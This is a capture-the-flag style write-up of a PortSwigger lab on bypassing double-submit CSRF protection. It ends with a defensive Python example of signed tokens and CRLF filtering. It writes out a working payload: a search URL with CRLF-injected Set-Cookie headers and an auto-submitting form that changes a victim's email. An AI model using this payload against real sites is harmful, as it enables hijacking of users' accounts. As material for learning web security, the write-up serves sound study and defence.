LAB 6 - CSRF where token is duplicated in cookie
Initial instructions
This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
You can log in to your own account using the following credentials: wiener:peter
First, log in with the wiener credentials, try to update the account's email address, and intercept that request with Burp Suite.
The intercepted request is shown below. Changing either value on its own makes the request fail: the csrf form parameter has to match the csrf cookie, so both have to be controlled together.

Now perform a search; the search term is reflected into a cookie set by the response.

Because the search function has no CSRF protection and reflects the search term into a Set-Cookie header without filtering CRLF characters, it can be used to inject arbitrary cookies into the victim user's browser.
I used the following payload.
The screenshot below shows that a new cookie with the value "fake" has been added.

Next I generate the CSRF PoC from my original change-email request,
but I replace the generated script block with the following line, which plants the csrf=fake cookie via the search endpoint and then submits the form once the image request has failed to load.
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
This is my final payload that I will send to the victim.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0a21002604339a6f80a70399009d00e5.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacked@hacked.xyz" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>
<img src="https://0a21002604339a6f80a70399009d00e5.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>
Send it to the victim. The attack works because both values are "fake": the server only checks that the csrf parameter equals the csrf cookie, and neither value is bound to the victim's session, so any matching pair the attacker can plant is accepted.
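To make the two weaknesses this lab chains together concrete (a search term reflected into Set-Cookie without CRLF filtering, and a double-submit check that only compares cookie and form field), here is an added Python example; it is not the lab's code or PortSwigger's, and the server key, session ids and the LastSearchTerm cookie name are assumptions. It models the lab's naive check next to a signed double-submit check that ties the token to the session, and a Set-Cookie builder that rejects the injected value from the payload above.

```python
"""Added example for this writeup, not code from the lab.

Models the two server-side flaws the lab chains: a double-submit CSRF check
that only compares cookie and form field, and a search term reflected into a
Set-Cookie header without rejecting CR/LF. Key, session ids and cookie name
are constructed values.
"""
import hashlib
import hmac
import secrets
from urllib.parse import unquote

SERVER_KEY = b"constructed-server-side-secret"  # assumption: secret held only by the server


def naive_double_submit_ok(cookie_csrf, form_csrf):
    """The lab's check: valid whenever the csrf cookie equals the csrf form field.
    Nothing binds either value to the user's session, so an attacker-chosen
    pair such as ("fake", "fake") passes once the cookie can be planted."""
    return bool(cookie_csrf) and cookie_csrf == form_csrf


def issue_signed_token(session_id, key=SERVER_KEY):
    """Signed double-submit: token = nonce.HMAC(key, session_id:nonce).
    An attacker can still plant a cookie, but cannot compute a valid MAC for
    the victim's session id without the server key."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def signed_double_submit_ok(session_id, cookie_csrf, form_csrf, key=SERVER_KEY):
    """Accept only if cookie and form field match AND the token verifies for
    the session that is actually making the request."""
    if not cookie_csrf or cookie_csrf != form_csrf:
        return False
    nonce, sep, mac = cookie_csrf.partition(".")
    if not sep:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def build_set_cookie(name, value):
    """Build the Set-Cookie line the search page emits, refusing values that
    could smuggle extra headers or cookie attributes."""
    if any(ch in value for ch in "\r\n\x00;"):
        raise ValueError("control character or separator in cookie value")
    return f"Set-Cookie: {name}={value}; Secure; SameSite=Strict"


def reflect_search_safely(raw_query_value):
    """Decode the ?search= value as the server would and reflect it into the
    (assumed) LastSearchTerm cookie; returns None if the value is rejected."""
    try:
        return build_set_cookie("LastSearchTerm", unquote(raw_query_value))
    except ValueError:
        return None


if __name__ == "__main__":
    # The lab's check accepts the planted pair; the signed check does not.
    print("naive accepts fake/fake:", naive_double_submit_ok("fake", "fake"))
    print("signed accepts fake/fake:", signed_double_submit_ok("victim", "fake", "fake"))
    tok = issue_signed_token("victim")
    print("signed accepts own token:", signed_double_submit_ok("victim", tok, tok))
    # The injected search value from the PoC is refused before it reaches a header.
    payload = "test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None"
    print("reflected header:", reflect_search_safely(payload))
```

The signed variant is the mitigation PortSwigger recommends over plain double-submit: the cookie is still compared with the form field, but the token also carries an HMAC over the session id, so a cookie the attacker injects via the search endpoint cannot validate. Rejecting CR and LF in reflected values closes the header-injection vector independently, and either fix alone breaks this exploit chain.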
